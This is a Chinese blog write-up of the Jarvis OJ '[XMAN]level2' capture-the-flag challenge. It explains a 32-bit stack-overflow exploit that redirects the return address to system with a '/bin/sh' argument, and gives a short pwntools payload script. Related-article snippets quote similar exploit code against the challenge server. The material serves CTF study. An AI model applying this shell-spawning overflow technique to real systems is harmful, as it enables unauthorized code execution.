18.9.18 Jarvis OJ PWN----[XMAN]level2

最新推荐文章于 2022-01-22 21:49:04 发布
最新推荐文章于 2022-01-22 21:49:04 发布
阅读量211 收藏
点赞数 1
分类专栏: PWN_WP 文章标签: [XMAN]level2 Jarvis OJ PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/82762221
版权

先检测文件

我们可以看到没有栈保护,可以利用栈溢出

拖进IDA

先是一个vulnerable_function函数,同时在函数列表中我们可以看到有system函数,我们可以把returnaddress牵引到system函数上,执行/bin/sh语句

buf的偏移量是0x88个字节,花0x04个字节覆盖ebp,然后伪造returnsddress跳转到system,再加上用来给system结束后的返回地址(任意,四个字节就好),然后补上执行语句

在system的HEX区域可以看到/bin/sh语句,那么该语句的地址也就知道了

上脚本

#函数主体
cn.recvuntil("Input:")
#key_addr=0x0804A024
key_addr =bin.search('/bin/sh').next()        #"/bin/sh"_address
system_addr=0x08048320
payload='a'*(0x88+0x04)+p32(system_addr)+'a'*0x04+p32(key_addr)
cn.sendline(payload)

 

 

 

 

xiaoyuyulala
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RSA算法总结(数学知识/CTF题型)
qi_SJQ_的博客
12-18 6428
1.RSA简介
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 375
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
强网杯2018 - nextrsa - Writeup
baikeng3674的博客
03-26 6096
强网杯2018 - nextrsa - Writeup 原文地址:M4x@10.0.0.55 所有代码均已上传至我的github 俄罗斯套娃一样的rsa题目,基本把我见过的rsa套路出了一遍,值得记录一下 level 0 QWB_nextrsa [master●] python exp.py [+] Opening connection to 39.107.33.90 on port...
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1141
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
RSA常见攻击算法
qq_24966613的博客
11-27 7560
RSA算法描述 RSA算法涉及三个参数,n,e,d,私钥为n,d,公钥为n,e。 其中n是两个大素数p,q的乘积。 d是e模$ varphi(n) $的逆元,$ varphi(n) $是n的欧拉函数。 c为密文,m为明文,则加密过程如下: $ cequiv m^e mod n $ 解密过程如下: ...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3534
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
Python库 | jarvis_ironman-5.3.1-py2.py3-none-any.whl
02-16
Python库“jarvis_ironman-5.3.1-py2.py3-none-any.whl”是一个用于Python开发的重要工具,特别适用于后端开发。这个库的版本为5.3.1,支持Python 2和Python 3两种解释器,表明它具有良好的向后兼容性,能满足不同...
PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl
02-07
标题中的"PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl"表明我们讨论的是一个从Python Package Index(PyPI)官方源下载的软件包,名为`jarvis_tools`,其版本号为2019.7.11。这个软件包是针对...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Python库 | jarvis_tools-10.23.2018-py2.py3-none-any.whl
03-31
资源分类:Python库 所属语言:Python 资源全名:jarvis_tools-10.23.2018-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 990
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
小指数rsa 多线程版writeup
u014281987的博客
08-17 1020
下载flag.enc 和pubkey.pem文件 将pem文件拖入openssl得到n(modulus)和e(exponent)  openssl rsa -pubin -text -modulus -in pubkey.pem n=C09778534564847D8CC4B420E9335867EC783E6CF5F05CA03EEEDC2563D0EB2A9EBA8F1952A2670B
[JarvisOj][XMAN]level2
weixin_34088838的博客
07-29 79
老套路 checksec ida查看 覆盖掉 之后system地址再返回覆盖 最后/bin/sh地址 # -*- coding:utf-8 -*- from pwn import * sh = remote('pwn2.jarvisoj.com', 9878) # remote junk = 'a' * 0x88 fakebp...
Writeup of level4(Pwn) in JarvisOJ
cossack9989的博客
02-16 1269
大年初一浅浅地学了个leak?0x00 What is DynELF?pwntool-DynELF详见官方文档咯~0x01 checksecroot@kali:~/Desktop/Pwn/level4# checksec level4 [*] '/root/Desktop/Pwn/level4/level4' Arch: i386-32-little RELRO: P...
18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)
qq_42192672的博客
09-19 287
先checksec一下 可以栈溢出,我们可以看到文件里有system函数,有/bin/sh字符串,美滋滋 64位函数的参数传递顺序和32位不同,传参顺序:rdi,rsi,rdx,rcx,r8,r9,栈,所以要把\bin\sh的地址放到rdi里 找一下可溢出的地方,在read函数里 关键点其实就是找出rdi地址(参考大佬的教学) 指令语句:ROPgadget --binary le...
Jarvis OJ-PWN-[XMAN]level2 wp
分不清东西南北的Laffey
09-30 535
地址:nc pwn2.jarvisoj.com 9878 把下载好的文件放到虚拟机中 用checksec看一下保护 【1】RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 【2】Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、lea...
Jarvis OJ level1
九层台
07-06 760
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
(Jarvis Oj)(Re) android_normal
Nothing
04-03 270
(Jarvis Oj)(Re) android_normal jeb打开apk 关键函数是stringFromJNI(),查看其来源 是在hellolibs里,于是用ida打开该库,找到函数 有一堆字符串,到内存窗口看看 wtf?? 又把flag瞎搞出来了 ...
jarvisoj_level2
最新发布
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值